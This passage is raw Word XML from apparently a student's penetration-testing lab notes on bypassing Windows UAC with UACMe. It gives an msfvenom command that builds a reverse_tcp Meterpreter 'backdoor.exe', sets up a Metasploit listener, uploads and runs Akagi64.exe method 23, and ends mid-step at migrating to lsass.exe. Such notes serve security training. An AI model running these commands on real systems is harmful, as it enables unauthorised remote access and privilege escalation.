        <w:t>UAC allows a program to be executed with administrative privileges, consequently prompting the user for confirmation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FE0A7F" w14:textId="34735327" w:rsidR="00E61D96" w:rsidRDefault="00E61D96" w:rsidP="00A84E9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>UAC has va</w:t>
      </w:r>
      <w:r w:rsidR="009734EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>rious integrity levels ranging from low to high, if the UAC protection level is set below high, Windows programs can be executed with elevated privileges without prompting the user for confirmation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75118AAD" w14:textId="1A051D8B" w:rsidR="009734EE" w:rsidRDefault="009734EE" w:rsidP="00A84E9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>There are multiple tools and techniques that can be used to bypass UAC, however the tool</w:t>
      </w:r>
      <w:r w:rsidR="00250CA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and technique used will depend on the version of Windows running on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A5A389" w14:textId="0C7EAEEE" w:rsidR="00864553" w:rsidRDefault="00864553" w:rsidP="00864553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Tool &amp; Technique used will depend on the version of the target system and the protection level configured for UAC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D36BFB" w14:textId="77777777" w:rsidR="00864553" w:rsidRDefault="00864553" w:rsidP="00864553">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35363C4C" w14:textId="48240D84" w:rsidR="00864553" w:rsidRDefault="00864553" w:rsidP="00864553">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>UACMe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4165DFD8" w14:textId="6B317D26" w:rsidR="00864553" w:rsidRDefault="00864553" w:rsidP="00864553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>UACMe is an open source, robust privilege escalation tool developed by hfire0x. It can be used to bypass Windows UAC by leveraging various techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B120860" w14:textId="7D5BD711" w:rsidR="00864553" w:rsidRDefault="00420090" w:rsidP="00864553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidR="00864553" w:rsidRPr="004128A8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          </w:rPr>
          <w:t>https://github.com/hfiref0x/UACME</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7F723405" w14:textId="40F842AF" w:rsidR="00864553" w:rsidRDefault="00864553" w:rsidP="00864553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The UACMe github repo has a very well documented list of methods that can be used to bypass UAC on multiple versions of Windows ranging from Windows 7 to 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6A9CD4" w14:textId="67F09EE4" w:rsidR="00864553" w:rsidRDefault="00864553" w:rsidP="00864553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>It allows attackers to execute malicious payload on a Windows target with admin/elevated privs by abusing the inbuilt Windows AuteElevate tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C47870C" w14:textId="616D5767" w:rsidR="00864553" w:rsidRDefault="00864553" w:rsidP="00864553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Contains more than 60 exploits, </w:t>
      </w:r>
      <w:r w:rsidR="00A3515B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>depending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C225D5" w14:textId="7BB319B9" w:rsidR="00082E78" w:rsidRPr="00864553" w:rsidRDefault="00082E78" w:rsidP="00864553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Essentially already using a </w:t>
      </w:r>
      <w:r w:rsidR="00C802AB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Windows built-in tool, AutoElevate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0FEB38" w14:textId="77777777" w:rsidR="005523EA" w:rsidRDefault="005523EA" w:rsidP="005523EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D78C24" w14:textId="3B83B015" w:rsidR="00466476" w:rsidRDefault="00466476" w:rsidP="00466476">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“net users” – Display users on the Windows machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D8A35F" w14:textId="2F09B2E6" w:rsidR="00466476" w:rsidRDefault="00466476" w:rsidP="00466476">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“net localgroup (</w:t>
      </w:r>
      <w:r w:rsidR="00AD0359">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>GROUP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>)” – Display groups that the user belongs to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C43B0DA" w14:textId="179791A1" w:rsidR="0099184D" w:rsidRDefault="0099184D" w:rsidP="0099184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Usually you’d want to use “administrators”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B091C1" w14:textId="526FC406" w:rsidR="003156F1" w:rsidRDefault="003156F1" w:rsidP="00466476">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Right click the application, “Run as administrator” will bring up </w:t>
      </w:r>
      <w:r w:rsidR="00921930">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>the UAC consent prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBB3868" w14:textId="77777777" w:rsidR="00921930" w:rsidRDefault="00921930" w:rsidP="00921930">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BB5661A" w14:textId="0BBFEF52" w:rsidR="00921930" w:rsidRPr="00921930" w:rsidRDefault="00921930" w:rsidP="00921930">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>UAC -&gt; Manage security level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED85158" w14:textId="722847E7" w:rsidR="00921930" w:rsidRDefault="00921930" w:rsidP="00921930">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The default configuration security level is never set to high.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A6D8DA" w14:textId="6BD20246" w:rsidR="002C5EE0" w:rsidRDefault="002C5EE0" w:rsidP="00921930">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“exploit/windows/</w:t>
      </w:r>
      <w:r w:rsidR="00821EEB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>http/rejetto_hfs_exec”</w:t>
      </w:r>
      <w:r w:rsidR="00EC6547">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Specifically for this lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D772326" w14:textId="77777777" w:rsidR="00EC6547" w:rsidRDefault="00EC6547" w:rsidP="00EC6547">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AF45F2A" w14:textId="1D6A5313" w:rsidR="004D7288" w:rsidRDefault="004D7288" w:rsidP="004D7288">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>To migrate to a x64 session</w:t>
      </w:r>
      <w:r w:rsidR="0054750E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, use the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EEB802" w14:textId="627A8299" w:rsidR="0054750E" w:rsidRDefault="0054750E" w:rsidP="0054750E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“pgrep explorer”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094BF859" w14:textId="00237F45" w:rsidR="0054750E" w:rsidRDefault="00AC7480" w:rsidP="0054750E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“migrate (ProcessID)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BA66DA" w14:textId="18218562" w:rsidR="00AC7480" w:rsidRDefault="00AC7480" w:rsidP="00AC7480">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“getprivs”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF43282" w14:textId="77777777" w:rsidR="007F5CB6" w:rsidRDefault="007F5CB6" w:rsidP="007F5CB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29C1E83B" w14:textId="4839957F" w:rsidR="007F5CB6" w:rsidRDefault="007F5CB6" w:rsidP="007F5CB6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Generate the payload with MSFVenom.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE16288" w14:textId="0964C443" w:rsidR="007F5CB6" w:rsidRDefault="007F5CB6" w:rsidP="007F5CB6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“msfvenom -p </w:t>
      </w:r>
      <w:r w:rsidR="00230F53">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>windows/meterpreter/reverse_tcp LHOST=(LOCAL HOST) LPORT=1234 -f exe &gt; backdoor.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184E939F" w14:textId="6DBCC376" w:rsidR="00B54E04" w:rsidRDefault="00B54E04" w:rsidP="00B54E04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Set up the Metasploit multi handler/listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029DD1D8" w14:textId="3A36A47A" w:rsidR="00B54E04" w:rsidRDefault="009D319A" w:rsidP="00B54E04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“use multi/handler”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3B4224" w14:textId="57B631BC" w:rsidR="009D319A" w:rsidRDefault="009D319A" w:rsidP="00B54E04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“set payload windows/meterpreter/reverse_tcp”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027DB034" w14:textId="3F31C5E7" w:rsidR="009D319A" w:rsidRDefault="009D319A" w:rsidP="00B54E04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Set LHOST and </w:t>
      </w:r>
      <w:r w:rsidR="00063639">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>LPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBA6D98" w14:textId="22FA09BF" w:rsidR="00F76C1A" w:rsidRDefault="00F76C1A" w:rsidP="00F76C1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Make Temp directory on the victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16987CA8" w14:textId="2B7CFFD2" w:rsidR="00F76C1A" w:rsidRDefault="00F76C1A" w:rsidP="00F76C1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“mkdir Temp” “cd Temp”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39634B54" w14:textId="0B00562B" w:rsidR="00F76C1A" w:rsidRDefault="00F76C1A" w:rsidP="00F76C1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“upload backdoor.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549AEF62" w14:textId="0E4C5A28" w:rsidR="00F76C1A" w:rsidRDefault="00F76C1A" w:rsidP="00F76C1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“upload Akagi64.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F03595F" w14:textId="02CA6054" w:rsidR="00827424" w:rsidRDefault="00827424" w:rsidP="00F76C1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Open up shell session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1904ADA6" w14:textId="04FDA242" w:rsidR="00BC18F6" w:rsidRDefault="00BC18F6" w:rsidP="00BC18F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Execute the Akagi64.exe </w:t>
      </w:r>
      <w:r w:rsidR="00285307">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>executable with respective method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E04B86E" w14:textId="44C9AB22" w:rsidR="00285307" w:rsidRDefault="00285307" w:rsidP="00285307">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“.\Akagi64.exe (METHOD, 23 in this lab’s case) C:\Temp\backdoor.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D40460" w14:textId="49B8DBD9" w:rsidR="00993414" w:rsidRDefault="00993414" w:rsidP="00285307">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>In this case, the argument 23 is a method which is invoked by the Akagi64.exe for bypassing UAC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF165E6" w14:textId="41BB99CA" w:rsidR="003D4916" w:rsidRDefault="003D4916" w:rsidP="003D4916">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Check to see if the multi/handler meterpreter listener received a shell!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2905281E" w14:textId="0FD55D82" w:rsidR="003C7EFF" w:rsidRDefault="003C7EFF" w:rsidP="003D4916">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Migrate to lsass.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1390C96E" w14:textId="502A59EB" w:rsidR="003C7EFF" w:rsidRDefault="003C7EFF" w:rsidP="003C7EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
